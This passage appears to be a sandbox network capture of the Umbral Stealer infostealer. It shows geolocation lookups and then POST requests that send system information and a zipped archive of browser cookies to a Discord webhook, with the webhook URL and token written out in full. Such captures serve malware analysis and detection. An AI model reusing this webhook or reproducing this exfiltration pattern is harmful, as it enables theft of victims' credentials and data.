                                      Data Ascii: ath fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                      2024-09-06 23:48:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 40 | Source IP: 192.168.2.5 | Source Port: 49776 | Destination IP: 188.114.97.3 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:23 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:23 UTC | 643 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:23 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:23 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uLv%2B5onN7umQtZzh9hIVi1vAKcEBHjq6S9tmzkHJi%2F4jkiEm8qSecOQL86Nkuh5fQrXhqWlQsXp09%2B%2BVGfxbWmECIQXnYCrs3LMj7PqEUSle9and7xbZKzRltECT3n%2Bj"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2597cdd24c445-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:23 UTC | 167 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID: 41 | Source IP: 192.168.2.5 | Source Port: 49778 | Destination IP: 104.21.85.189 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:23 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:23 UTC | 732 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:23 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7904
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VTB36ZXH120ESFFBFTB5W
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hcae5LDQ5w%2Fq4ZwXH%2FdwgweebvJCgR5s8oK3moC98jUHkBVCRioGWGyMaroWfZo5qiv785f77Th2dZKqQYQ2FC6W8JotWHzkvBm4xyYC01loswjVknvA8DOlWSN8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2598089b2434a-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:23 UTC637INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:23 UTC1369INData Raw: 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76
                                      Data Ascii: ; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100v
                                      2024-09-06 23:48:23 UTC1083INData Raw: 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36
                                      Data Ascii: path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                      2024-09-06 23:48:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 42 | Source IP: 192.168.2.5 | Source Port: 49780 | Destination IP: 188.114.97.3 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:25 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:25 UTC | 637 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:25 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:25 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swQ51pXKbx4zhNlzt3cUJlHcwjwqhqSHkvc2Dm9N2gG8QWBFPpfT5qPRS9n294izLA%2BoNkyP5A0HTokbGTQKRaT%2Fo5Aat9E8ovSKUT8hIiEm5jQrC64pKezc1u7s1baS"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2598aca934358-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:25 UTC | 167 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID: 43 | Source IP: 192.168.2.5 | Source Port: 49781 | Destination IP: 104.21.85.189 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:25 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:26 UTC | 741 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33361
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VTDTQVG8PGMEA6ESZANNE
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hK1%2FaoW8Wrlo0mYPgZleMLtCRkVOnOS%2FHNHblxiAm8BGVuGbyCA8ZqGJSl8PGfG%2F9v84Y%2Fm%2FOCqfHMkiKHGptBdJv89JYZS442%2FNgCMIEv6N4YmNsiUANWZdn3Ia"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25991fd301a28-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:26 UTC628INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:26 UTC1369INData Raw: 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69
                                      Data Ascii: adding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; hei
                                      2024-09-06 23:48:26 UTC1092INData Raw: 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7
                                      2024-09-06 23:48:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID: 44 | Source IP: 192.168.2.5 | Source Port: 49784 | Destination IP: 188.114.97.3 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:30 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:30 UTC | 641 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:30 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:30 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OG%2FvU4B5ecaVxOHp86RrbqqZPi3Z%2FQfIVKDE1GcVZHyCCkFRPS5gj0gcAglqU5DHKfiHZJDdnf1k3mD%2B4qmngEl%2FZwhMU7lSD3xSaCBJMu5uC87cC149ICTD3WY0MIf9"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259a8bc194232-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:30 UTC | 167 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID: 45 | Source IP: 192.168.2.5 | Source Port: 49786 | Destination IP: 162.159.135.232 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:31 UTC | 360 | OUT | POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 941
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:31 UTC | 25 | IN | HTTP/1.1 100 Continue
                                      2024-09-06 23:48:31 UTC941OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 39 32 37 35 33 37 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                      Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                      2024-09-06 23:48:31 UTC | 1369 | IN | HTTP/1.1 204 No Content
                                      Date: Fri, 06 Sep 2024 23:48:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      set-cookie: __dcfduid=85cdf00e6caa11ef9b3df2c32ce171c1; Expires=Wed, 05-Sep-2029 23:48:31 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666512
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0M6vpGVF3VL%2FGDHQ78jAS6%2FyP2C7QjJ254zJbmpehLg%2Fqq%2F0qBlguOBKzdzk%2FbiMBNXuUIDptVSxastBDztY7rU6ZQYU2RH1g3bs9YR1FNmUfHH1ntjBp5J2aXj"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=85cdf00e6caa11ef9b3df2c32ce171c137218182d8aa374246002fbc2930300cdb6665d1191f1663e70ffce071df6d96; Expires=Wed, 05-Sep-2029 23:48:31 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=e26c311cc7ee22793530bb2999f806ab38f7e645-1725666511; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie:
                                      2024-09-06 23:48:31 UTC | 200 | IN | Data Raw: 20 5f 63 66 75 76 69 64 3d 4b 6c 7a 32 6f 49 31 72 49 38 31 73 4a 69 58 77 6d 45 33 2e 6a 5f 59 5a 34 73 6c 47 4a 6c 44 6a 47 5f 4b 51 4a 75 59 50 6a 76 51 2d 31 37 32 35 36 36 36 35 31 31 37 30 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 66 32 35 39 62 30 34 39 39 31 34 33 66 39 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: _cfuvid=Klz2oI1rI81sJiXwmE3.j_YZ4slGJlDjG_KQJuYPjvQ-1725666511703-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8bf259b0499143f9-EWR


                                      Session ID: 46 | Source IP: 192.168.2.5 | Source Port: 49787 | Destination IP: 162.159.135.232 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:32 UTC | 684 | OUT | POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="813bb1a4-ecad-47dc-aab9-54bf0bcadfce"
                                      Host: discord.com
                                      Cookie: __dcfduid=85cdf00e6caa11ef9b3df2c32ce171c1; __sdcfduid=85cdf00e6caa11ef9b3df2c32ce171c137218182d8aa374246002fbc2930300cdb6665d1191f1663e70ffce071df6d96; __cfruid=e26c311cc7ee22793530bb2999f806ab38f7e645-1725666511; _cfuvid=Klz2oI1rI81sJiXwmE3.j_YZ4slGJlDjG_KQJuYPjvQ-1725666511703-0.0.1.1-604800000
                                      Content-Length: 465005
                                      Expect: 100-continue
                                      2024-09-06 23:48:32 UTC | 25 | IN | HTTP/1.1 100 Continue
                                      2024-09-06 23:48:32 UTC | 40 | OUT | Data Raw: 2d 2d 38 31 33 62 62 31 61 34 2d 65 63 61 64 2d 34 37 64 63 2d 61 61 62 39 2d 35 34 62 66 30 62 63 61 64 66 63 65 0d 0a
                                      Data Ascii: --813bb1a4-ecad-47dc-aab9-54bf0bcadfce
                                      2024-09-06 23:48:32 UTC | 140 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 0d 0a 0d 0a
                                      Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 0d 9e 26 59 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                      Data Ascii: PK&Y*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 0b 58 e8 b1 ad 3a 0c 5b 87 b1 73 33 9f 1f f4 2b 28 7d 97 ec 9f 95 a8 46 4a 17 56 26 30 61 a2 07 2c 87 83 60 a2 01 52 d9 98 4b ab ed 4f 56 96 7f 5e e2 1d 3e ae 0b d2 d7 77 00 be d9 1d ea 93 95 54 ca 6b 45 2a 73 ed 2f e9 81 23 f5 51 3f 24 50 70 a0 bd 8c 53 86 f4 f6 0b 39 03 ce 9c 86 6a bd 2e 4d 1a 26 1b ac 02 df 7c 56 c4 ff a5 44 98 ee 31 1f 7f 77 79 ef 86 ac 2c 39 32 80 1c d8 fa 49 a6 b7 a1 6b bf 33 9c 01 fb dd 6a 28 6d 31 af d3 6f e3 c2 d4 00 d7 0a da 60 54 72 2c 63 6e ea 85 20 3a 1d 8f 4d eb b2 c5 51 35 49 a4 cd 5a f9 01 ff 1d 26 45 f2 cb e3 98 35 4a d2 af b1 17 07 b7 b1 8f 82 4c 94 fd 9f 79 1c 1d 34 f3 32 08 22 c2 bf da eb 0c 6a 47 07 b1 7b 69 c4 2c 5a da c3 4a 95 58 54 16 b0 f5 a1 30 7e f5 40 63 97 69 66 10 9c 75 da ac 78 bd 44 e3 95 ce 89 43 2a 1b df
                                      Data Ascii: X:[s3+(}FJV&0a,`RKOV^>wTkE*s/#Q?$PpS9j.M&|VD1wy,92Ik3j(m1o`Tr,cn :MQ5IZ&E5JLy42"jG{i,ZJXT0~@cifuxDC*
